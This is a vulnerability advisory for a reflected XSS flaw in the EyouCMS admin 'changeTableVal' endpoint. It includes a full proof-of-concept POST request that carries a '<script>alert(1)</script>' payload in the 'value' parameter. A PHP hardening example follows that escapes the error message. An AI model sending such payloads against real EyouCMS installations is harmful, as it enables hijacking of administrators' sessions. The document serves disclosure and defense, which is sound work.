Description
Reflected XSS in the backend article attribute type change request, through the POST parameter value.
When value contains a non-integer character, the XSS payload is shown in the error reporting message.
Affected Version
EyouCMS <= 1.6.0-UTF8-SP1
POC
POST /cms/eyoucms/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=ArchivesFlag&a=index&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex; ENV_IS_UPHTML=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

value=%BA0<script>alert(1)</script>&field=status&id_value=1&id_name=id&table=archives_flag
Reference
Reported by Srpopty, vulnerability discovered by using Corax.
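
One way to handle a rejected value on the server so that it cannot execute in the error message, as an added example (not EyouCMS code). The function names and the message text are hypothetical, and the sample input is the PoC's value parameter after URL decoding.

```php
<?php
// Added example, not EyouCMS code; names and message text are hypothetical.

// Vulnerable pattern (for contrast): the rejected input is concatenated
// into the error text as-is, e.g.  'Invalid integer value: ' . $value

// Hardened: escape anything untrusted that ends up in the message.
// ENT_SUBSTITUTE matters for the PoC's %BA byte: without it,
// htmlspecialchars() returns an empty string on invalid UTF-8.
function error_message_safe(string $value): string
{
    $shown = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return 'Invalid integer value: ' . $shown;
}

// Validate "value" for an integer field. Returns [ok, message].
function check_value($value): array
{
    if (!is_string($value)) {
        // Arrays (value[]=...) and other types are rejected without echo.
        return [false, 'Invalid integer value'];
    }
    if (filter_var($value, FILTER_VALIDATE_INT) === false) {
        return [false, error_message_safe($value)];
    }
    return [true, 'ok'];
}

// Answer the AJAX call as JSON and forbid content sniffing, so the
// body is not rendered as HTML even if opened directly in a browser.
header('Content-Type: application/json; charset=utf-8');
header('X-Content-Type-Options: nosniff');

// Constructed input: the PoC's "value" parameter after URL decoding.
$value = "\xBA0<script>alert(1)</script>";

[$ok, $msg] = check_value($value);

// $msg now holds &lt;script&gt;... and U+FFFD in place of the 0xBA byte,
// so json_encode() also succeeds (it fails on invalid UTF-8).
echo json_encode(['code' => $ok ? 1 : 0, 'msg' => $msg]), "\n";
```

The client side still has to insert msg as text rather than as HTML; escaping on the server covers the case where it does not.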